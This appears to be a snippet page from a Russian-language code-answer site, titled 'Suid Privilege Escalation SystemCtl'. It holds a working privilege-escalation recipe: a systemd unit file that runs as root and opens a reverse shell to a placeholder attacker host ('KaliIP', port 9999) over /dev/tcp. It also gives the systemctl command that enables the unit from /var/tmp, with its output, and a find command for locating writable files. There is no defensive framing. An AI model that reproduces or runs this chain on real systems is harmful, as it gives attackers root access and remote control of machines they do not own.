“Suid Privilege Escalation SystemCtl” Ответ

Suid Privilege Escalation SystemCtl

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target
Breakable Bug

Suid Privilege Escalation SystemCtl

/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
Breakable Bug

Suid Privilege Escalation SystemCtl

find -type f -maxdepth 2 -writable
Breakable Bug

Ответы похожие на “Suid Privilege Escalation SystemCtl”

Вопросы похожие на “Suid Privilege Escalation SystemCtl”

Смотреть популярные ответы по языку

Смотреть другие языки программирования